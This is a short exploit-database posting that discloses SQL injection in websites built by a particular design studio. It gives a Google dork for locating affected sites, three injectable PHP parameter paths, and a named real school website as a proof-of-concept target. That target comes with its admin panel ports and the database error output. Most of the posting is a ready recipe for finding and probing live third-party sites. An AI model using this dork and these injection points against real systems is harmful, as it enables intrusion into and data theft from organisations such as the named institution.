Design by Christian Bernal Development by Monoattack SQL Injection Vulnerability

2018.10.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Design by Christian Bernal Development by Monoattack SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/10/2018 # Vendor Homepage : cbernalstudio.com ~ monoattack.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Design by Christian Bernal - Development by Monoattack'' site:ec # Admin Panel Path : TARGET:2083 TARGET:2096 # SQL Injection Exploit : /interna.php?cupcod=[SQL Injection] /manta/interna.php?cat=[SQL Injection] /salinas/noticias.php?1&actual=[SQL Injection] ################################################################################################# # Example Vulnerable Site => jefferson.edu.ec/interna.php?cupcod=1417%27 => [ Proof of Concept ] => # Example Vulnerable Site Admin Panel Paths => jefferson.edu.ec:2083 ~ jefferson.edu.ec:2096 # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cupcod IN (SELECT s.cupcod ' at line 3 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 3 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-christian-bernal-monoattack-sql-inj-vulnerability.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top